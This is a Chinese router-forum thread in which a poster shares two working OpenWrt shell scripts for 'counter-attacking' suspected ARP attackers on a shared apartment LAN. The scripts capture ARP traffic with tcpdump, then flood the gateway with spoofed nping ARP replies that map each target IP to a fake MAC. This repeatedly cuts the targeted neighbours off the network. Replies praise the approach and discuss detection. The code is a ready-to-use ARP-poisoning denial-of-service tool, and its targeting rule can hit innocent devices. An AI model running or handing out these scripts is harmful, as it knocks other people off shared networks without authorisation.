找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 1514|回复: 15

openwrt反攻局域网arp攻击shell脚本

[复制链接]
发表于 2022-8-7 19:35 | 显示全部楼层 |阅读模式
本帖最后由 null666666 于 2023-3-16 13:06 编辑

shell脚本,局域网arp攻击狗实在蛋疼,arptables防火墙只能防止向下欺骗,没法保证这些人攻击网关,所以我给旧路由(极路由1s) 刷了openwrt,用screen 运行了自己写的反攻脚本!
无人值守,自动攻击,对方几分钟断网一次,对于打游戏的那帮人,估计快疯了,横行嚣张局域网1年了,这会儿丫估计快尿了!不建议不懂shell的用,要安装好些软件,ip-full,arptables,nping....
我把代码放上来,懂得拿去改改用,懒得注释!


1.主脚本,用于收集arp攻击设备ip,去重,然后调用子脚本多线程攻击
  1. #!/bin/sh

  2. mac_spc() {
  3.     local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')
  4.     local f=$(cat macf6e.txt | sed -n "${i}p")
  5.     local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')
  6.     local l=":${s:0:2}:${s:2:2}:"
  7.     echo $f$l
  8. }
  9. rnd_num() {
  10.     echo $(awk 'BEGIN{srand();printf int((4*rand())+1)}')
  11.     return 0
  12. }

  13. wd=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}' | awk 'BEGIN{FS=".";OFS="."}{print $1,$2,$3}')
  14. gw_ip="${wd}.1"
  15. gw_mac=$(cat /proc/net/arp | grep -w "${gw_ip}" | awk '{print $4}')
  16. ipx=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}')
  17. js=0
  18. res=""
  19. lst=""
  20. chs=5
  21. while getopts ':i' OPT; do
  22.     case $OPT in
  23.     i) $OPTARG + 10 &>/dev/null && chs=$OPTARG ;;
  24.     esac
  25. done

  26. while true; do
  27.     arping -DI wlan0 ${gw_ip} &>/dev/null
  28.     sleep 1s
  29.     >attc220806_file
  30.     {
  31.         tcpdump -qnei wlan0 arp net ${wd} and not host ${gw_ip} and dst host ${ipx} -l | awk -F '[, ]+' '{print $9}' >>attc220806_file
  32.     } &>/dev/null &
  33.     sleep 60s
  34.     killall 'tcpdump'
  35.     >attc220806_res
  36.     sort -u attc220806_file | grep -v "^$" >attc220806_res
  37.     if [ -s './attc220806_res' ]; then
  38.         let js++
  39.         fmacc=$(mac_spc)
  40.         j=10
  41.         if [ $js -gt $chs ]; then
  42.             js=0
  43.             cat /root/attc220806_alst /root/attc220806_res | sort -n | uniq -u >/root/attc220806_grd
  44.             lst="/root/attc220806_grd"
  45.         else
  46.             lst="/root/attc220806_res"
  47.         fi
  48.         while read i; do
  49.             let j++
  50.             macc="${fmacc}$j"
  51.             {
  52.                 ./ntt2.sh 6 100 "${gw_ip}" "${gw_mac}" "${i}" "${macc}"
  53.             } &>/dev/null &
  54.         done <${lst}
  55.         wait
  56.         res="table: ${lst}, $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)"
  57.         echo -e "${res}" | tee -a /root/libfl/attc220806log
  58.         cat ${lst} >>/root/libfl/attc220806log
  59.     else
  60.         echo -e "attc220806_res empty!...  $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)" | tee -a /root/libfl/attc220806log
  61.     fi
  62.     sleep $(rnd_num)m
  63. done
复制代码


2.子脚本ntt2.sh,用于调用nping 刷网关缓存,把对方的ip刷到一个不存在的mac,让对方无法上网
  1. #!/bin/sh

  2. mac_rnd() {
  3.     local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')
  4.     local f=$(cat /root/macf6e.txt | sed -n "${i}p")
  5.     local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')
  6.     local l=":${s:0:2}:${s:2:2}:${s:4:2}"
  7.     echo $f$l
  8.     return 0
  9. }

  10. ctt=$1
  11. ktt=$2
  12. gtw_ip=$3
  13. gtw_mac=$4
  14. fwip=$5
  15. fmac=$6

  16. # echo "nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip"

  17. tmp_fifo="./$$.fifo"
  18. mkfifo "${tmp_fifo}"
  19. exec 6<>"${tmp_fifo}"
  20. rm -rf "${tmp_fifo}"

  21. for i in $(seq 1 $ctt); do
  22.     echo
  23. done >&6

  24. for j in $(seq 1 $ktt); do
  25.     read -u6
  26.     {
  27.         nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip
  28.         echo >&6
  29.     } &>/dev/null &
  30. done
  31. wait
  32. exec 6<&-
  33. exec 6>&-
  34. exit 0
复制代码


3.效果大概如下图,用另一台openwrt 路由tcpdump 抓的arp包

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
发表于 2022-8-7 20:19 | 显示全部楼层
不错,给他点狠的

点评

嘿嘿,谢谢  详情 回复 发表于 2022-8-7 20:25
回复 支持 反对

使用道具 举报

 楼主| 发表于 2022-8-7 20:25 | 显示全部楼层
wulishui 发表于 2022-8-7 20:19
不错,给他点狠的

嘿嘿,谢谢
回复 支持 反对

使用道具 举报

发表于 2022-8-7 20:58 | 显示全部楼层
那么你是来炫耀的还是来分享干货的?

点评

没有,没有,抛砖引玉,恩山大神如麻,我岂敢造次板门弄斧!只是让人攻击的实在没辙了,自己研究了半天,一点小成果,记录一下  详情 回复 发表于 2022-8-7 21:04
回复 支持 反对

使用道具 举报

发表于 2022-8-7 21:02 | 显示全部楼层
发错了,在恩山APP里面不显示代码,还以为你没发代码
回复 支持 反对

使用道具 举报

 楼主| 发表于 2022-8-7 21:04 | 显示全部楼层
moqingzhu 发表于 2022-8-7 20:58
那么你是来炫耀的还是来分享干货的?

没有,没有,抛砖引玉,恩山大神如麻,我岂敢造次板门弄斧!只是让人攻击的实在没辙了,自己研究了半天,一点小成果,记录一下
回复 支持 反对

使用道具 举报

发表于 2022-8-7 21:08 | 显示全部楼层
我的做法是,发现某MAC有两个IP的话,就禁他。不过有一定错杀。

点评

你是在路由器里面看的吗,还是用 arping -D检测的,还是其他啥方法,我住个公寓,人乱的很,估计有懂网络的,不知道用的啥技术?我也弄不明白,一般比较卡的时候,用arping -D 检测网关,倒是只有网关回复,但是同时  详情 回复 发表于 2022-8-7 21:48
回复 支持 反对

使用道具 举报

 楼主| 发表于 2022-8-7 21:48 | 显示全部楼层
wulishui 发表于 2022-8-7 21:08
我的做法是,发现某MAC有两个IP的话,就禁他。不过有一定错杀。

你是在路由器里面看的吗,还是用 arping -D检测的,还是其他啥方法,我住个公寓,人乱的很,估计有懂网络的,不知道用的啥技术?我也弄不明白,一般比较卡的时候,用arping -D 检测网关,倒是只有网关回复,但是同时用tcpdump 抓arp包,会有好几台设备疯狂的询问我的mac 地址,然后把这些机器反攻了,就不卡了,搞不明白具体啥状况?

点评

我是在路由上搞,原来你是在客户端搞  详情 回复 发表于 2022-8-7 22:10
回复 支持 反对

使用道具 举报

发表于 2022-8-7 21:52 | 显示全部楼层

回复 支持 反对

使用道具 举报

发表于 2022-8-7 22:10 | 显示全部楼层
null666666 发表于 2022-8-7 21:48
你是在路由器里面看的吗,还是用 arping -D检测的,还是其他啥方法,我住个公寓,人乱的很,估计有懂网络 ...

我是在路由上搞,原来你是在客户端搞

点评

我也是在路由呀,只不过路由器差不多 当成一个网卡用了,一个光猫既拨号又路由,然后接一个交换机,交换机接一些二级路由 提供wifi热点,然后我的路由 用无线中继在 这些二级路由上,或者是 光猫默认开的那个wifi上  详情 回复 发表于 2022-8-7 22:32
回复 支持 反对

使用道具 举报

 楼主| 发表于 2022-8-7 22:32 | 显示全部楼层
wulishui 发表于 2022-8-7 22:10
我是在路由上搞,原来你是在客户端搞

我也是在路由呀,只不过路由器差不多 当成一个网卡用了,一个光猫既拨号又路由,然后接一个交换机,交换机接一些二级路由 提供wifi热点,然后我的路由 用无线中继在 这些二级路由上,或者是 光猫默认开的那个wifi上,然后交换机里面 N多arp攻击,我就是  干这些arp攻击
回复 支持 反对

使用道具 举报

发表于 2022-8-8 12:40 | 显示全部楼层
用于图书馆?

点评

不是,别乱用,我是用来对付 公寓局域网的arp攻击的人,毕竟反攻的思路也是arp攻击,用多线程更高强度的攻击而已  详情 回复 发表于 2022-8-8 18:00
回复 支持 反对

使用道具 举报

 楼主| 发表于 2022-8-8 18:00 | 显示全部楼层

不是,别乱用,我是用来对付 公寓局域网的arp攻击的人,毕竟反攻的思路也是arp攻击,用多线程更高强度的攻击而已
回复 支持 反对

使用道具 举报

发表于 2022-8-9 15:18 | 显示全部楼层
大佬,这些代码是一个一个敲出来的吗?
有没有比较好的思考的网站

点评

别,别,我是菜鸡,b站有 某黑马的shell 视频教程,我是跟那个学的,但是shell 有很多种,有一些小差异,比如openwrt 里面这个 连数组都不支持,还得边学边摸索  详情 回复 发表于 2022-8-9 19:00
回复 支持 反对

使用道具 举报

 楼主| 发表于 2022-8-9 19:00 | 显示全部楼层
synoman 发表于 2022-8-9 15:18
大佬,这些代码是一个一个敲出来的吗?
有没有比较好的思考的网站

别,别,我是菜鸡,b站有 某黑马的shell 视频教程,我是跟那个学的,但是shell 有很多种,有一些小差异,比如openwrt 里面这个 连数组都不支持,还得边学边摸索

点评

多谢  详情 回复 发表于 2022-8-11 08:11
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

欢迎大家光临恩山无线论坛上一条 /1 下一条

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-6-30 08:27

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com

快速回复 返回顶部 返回列表